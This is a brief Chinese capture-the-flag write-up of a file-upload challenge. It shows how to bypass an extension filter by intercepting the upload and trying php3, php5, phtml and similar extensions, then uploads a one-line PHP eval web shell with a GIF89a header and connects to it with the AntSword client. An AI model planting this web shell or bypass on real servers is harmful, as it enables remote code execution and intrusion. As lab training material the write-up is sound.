明了但不明显的文件上传
传个试试
行,抓包吧,php格式不行,就先上传要求的格式:jpg、png、gif
抓到上传的包之后,再修改成我们想要的
常见的php格式绕过有:php,php3,php4,php5,phtml,pht
挨个试试
这是上个图片题上传的木马,没有改格式,让上传图片,最好加上(GIF89a)
一句话木马:GIF89a
<script language="php">eval($_POST['cmd']);</script>
上传成功,它也把保存的路径告诉你了
掏出蚁剑大宝贝梭哈就完了
flag
